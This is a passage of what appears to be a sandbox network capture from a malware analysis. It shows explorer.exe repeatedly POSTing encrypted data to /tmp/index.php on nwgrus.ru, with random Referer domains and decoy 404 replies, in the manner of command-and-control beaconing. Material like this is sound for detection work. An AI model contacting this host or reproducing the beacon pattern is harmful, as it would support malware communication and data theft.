Oct 12, 2024 23:28:07.766947985 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49811	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:07.774807930 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ymhiquwyrvgqovol.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 313 Host: nwgrus.ru
Oct 12, 2024 23:28:07.774832010 CEST	313	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 33 40 ee e1 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu3@H%](lF]Eke?l{\0Jf.3y9NxP#i%By\o;]U;7Oj'lzQBB1
Oct 12, 2024 23:28:09.196805000 CEST	189	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:08 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49828	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:10.782593012 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ydoywfwjttlrcvfk.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 198 Host: nwgrus.ru
Oct 12, 2024 23:28:10.782609940 CEST	198	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f4 76 0b 75 78 43 ea 81 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA ,[k,vuxCksGGq;^=u?nAkM+oSN.4R a<$-??B%\|h/C^
Oct 12, 2024 23:28:12.186402082 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49839	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:12.201994896 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yjtrvkrlityi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 271 Host: nwgrus.ru
Oct 12, 2024 23:28:12.202006102 CEST	271	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 51 32 d0 af Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuQ2_A{rBeFjY4uj;cnWF{)C/YsV5? n<~:QEY.6T6p}TRiyHgm~s7:t
Oct 12, 2024 23:28:13.597269058 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49848	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:13.607196093 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mjjimnkvahrtrhwm.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 338 Host: nwgrus.ru
Oct 12, 2024 23:28:13.607232094 CEST	338	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 55 09 e3 f1 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuUT5nX?kphAOfHG1 Z55%RCPG&[L@$aqr=kO@%no<l=]J*
Oct 12, 2024 23:28:14.979952097 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:14 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49856	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:14.988976955 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gppslndiqwv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 228 Host: nwgrus.ru
Oct 12, 2024 23:28:14.989056110 CEST	228	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 54 00 e1 b8 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuTy8kpWKR``KZe`-Ce\T:d$-pC:'Yf`<Nk]"wrsB*
Oct 12, 2024 23:28:16.367022991 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:16 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49862	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:16.376106024 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gbbsahanxxry.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 190 Host: nwgrus.ru
Oct 12, 2024 23:28:16.376106024 CEST	190	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 4b 4a f8 e7 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuKJWHksZ*PQ-h40}x?\V VL=CHEQ A4(mj0M#,
Oct 12, 2024 23:28:17.789314032 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49873	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:17.809283018 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qvmvwcqodtkhh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 284 Host: nwgrus.ru
Oct 12, 2024 23:28:17.809319973 CEST	284	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 56 33 e0 e3 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuV3b7GXcEjR>{T\E0@;j3{#%>.:6~K*}`TeZE0Bp&pctBQ~o_z%[
Oct 12, 2024 23:28:19.159792900 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49882	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:19.170994997 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wvcoypmusqw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 312 Host: nwgrus.ru
Oct 12, 2024 23:28:19.170994997 CEST	312	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 6e 24 b8 a8 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vun$qPqtx8]"%1FA"@#2-Z0$G?f<%^.1.}1?X~7F53_m}\&3R<Ox''@Ca
Oct 12, 2024 23:28:20.513290882 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49890	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 23:28:20.523128033 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://drxslflnmsuof.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 237 Host: nwgrus.ru
Oct 12, 2024 23:28:20.523176908 CEST	237	OUT	Data Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 7c 47 b0 a4 Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu\|GQ@F*B"~0U>(_GR<79-P-cHRTE-u2M]NycVD+:i#hLCP2}
Oct 12, 2024 23:28:21.887073994 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 21:28:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 